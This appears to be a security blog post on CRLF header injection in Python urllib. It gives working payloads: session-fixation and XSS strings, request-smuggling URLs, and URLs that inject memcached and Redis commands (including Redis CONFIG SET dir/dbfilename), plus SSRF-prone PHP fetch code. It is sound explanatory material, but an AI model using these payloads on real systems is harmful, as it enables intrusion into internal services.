HTTP Header Injection in Python urllib
catalogue
1. Overview 2. The urllib Bug 3. Attack Scenarios 4. 其他场景 5. 防护/缓解手段
1. Overview
Python's built-in URL library ("urllib2" in 2.x and "urllib" in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. "smuggling" attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.
类似于crlf注入,python的urllib2/3的这个漏洞的本质在于HTTP协议是一个7层的弱格式协议,而库本身又未对输入源进行敏感字符过滤,导致注入的发生
0x1: CRLF Injection
CRLF是"回车 + 换行"(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP 内容并显示出来。所以,一旦我们能够控制HTTP 消息头中的字符,注入一些恶意的换行,这样我们就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting,简称HRS
0x2: CRLF Injection实例
1. 注入302跳转
一个正常的302跳转包是这样
HTTP/1.1 302 Moved Temporarily Date: Fri, 27 Jun 2014 17:52:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://www.sina.com.cn
注入
http://www.sina.com.cn%0aSet-cookie:JSPSESSID%3Dwooyun
注入了一个换行,此时的返回包就会变成这样
HTTP/1.1 302 Moved Temporarily Date: Fri, 27 Jun 2014 17:52:17 GMT Content-Type: text/html Content-Length: 154 Connection: close Location: http://www.sina.com.cn Set-cookie: JSPSESSID=wooyun
这样就给访问者设置了一个SESSION,造成一个"会话固定漏洞"
2. 注入XSS
http://www.sina.com.cn0d%0a%0d%0a<img src=1 onerror=alert(/xss/)>
返回包
HTTP/1.1 302 Moved Temporarily Date: Fri, 27 Jun 2014 17:52:17 GMT Content-Type: text/html Content-Length: 154 Connection: close
<img src=1 onerror=alert(/xss/)>
浏览器会根据第一个CRLF把HTTP包分成头和体,然后将体显示出来。于是这里这个标签就会显示出来,造成一个XSS
3. 注入多个(multi)HTTP请求包
通过在换行回车后再注入一个新的HTTP(甚至可以是gopher协议)包,让url解析方发出多个HTTP请求
Relevant Link:
http://drops.wooyun.org/papers/2466
2. The urllib Bug
The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections
#!/usr/bin/env python3 import sys import urllib import urllib.error import urllib.request url = sys.argv[1] try: info = urllib.request.urlopen(url).info() print(info) except urllib.error.URLError as e: print(e)
This script simply accepts a URL in a command line argument and attempts to fetch it.
./fetch.py http://114.215.190.203:12345/foo
malicious hostname inject
./fetch.py http://114.215.190.203%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo
Here the attacker can fully control a new injected HTTP header.
The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to lookup the appropriate hostname
3. Attack Scenarios
0x1: HTTP Header Injection and Request Smuggling
if an ordinary HTTP request sent by urllib looks like this
GET /foo HTTP/1.1 Accept-Encoding: identity User-Agent: Python-urllib/3.4 Host: 127.0.0.1 Connection: close
Then an attacker could inject a whole extra HTTP request into the stream with URLS like
./fetch.py http://114.215.190.203%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo
0x2: Attacking memcached
类似于通过SSRF注入memcache,http header injection同样可以劫持server端,向内网的redis、memcache应用发起TCP请求,实现内网渗透的效果
In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL
./fetch.py http://114.215.190.203%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:12345/foo
the above lines in light of memcached protocol syntax, most of the above syntax errors. However, memcached does not close the connection upon receiving bad commands. This allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):
ERROR
ERROR
ERROR
ERROR
ERROR
STORED
ERROR
ERROR
0x3: Attacking Redis
./fetch.py http://114.215.190.203%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo
Relevant Link:
http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html
4. 其他场景
0x1: PHP URL解析库
1. CURL
<?php if (isset($_GET['url'])) { $link = $_GET['url']; $curlobj = curl_init(); curl_setopt($curlobj, CURLOPT_POST, 0); curl_setopt($curlobj,CURLOPT_URL,$link); curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($curlobj); curl_close($curlobj); echo $result; } ?>
2. file_get_contents
<?php $url = $_GET['url']; $content = file_get_contents($url); echo $content; ?>
3. fsocket
PHP的URL解析相关库在发起URL远程请求前,会对参数进行敏感字符过滤
5. 防护/缓解手段
PHP header()函数中提到了:
从 PHP 4.4 之后,该函数防止一次发送多个报头。这是对头部注入攻击的保护措施
Relevant Link:
http://php.net/manual/en/function.header.php
Copyright (c) 2016 LittleHann All rights reserved
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· .NET10 - 预览版1新功能体验(一)
2015-06-17 Security Access Control Strategy && Method And Technology Research - 安全访问控制策略及其方法技术研究
2014-06-17 PHP Code Reviewing Learning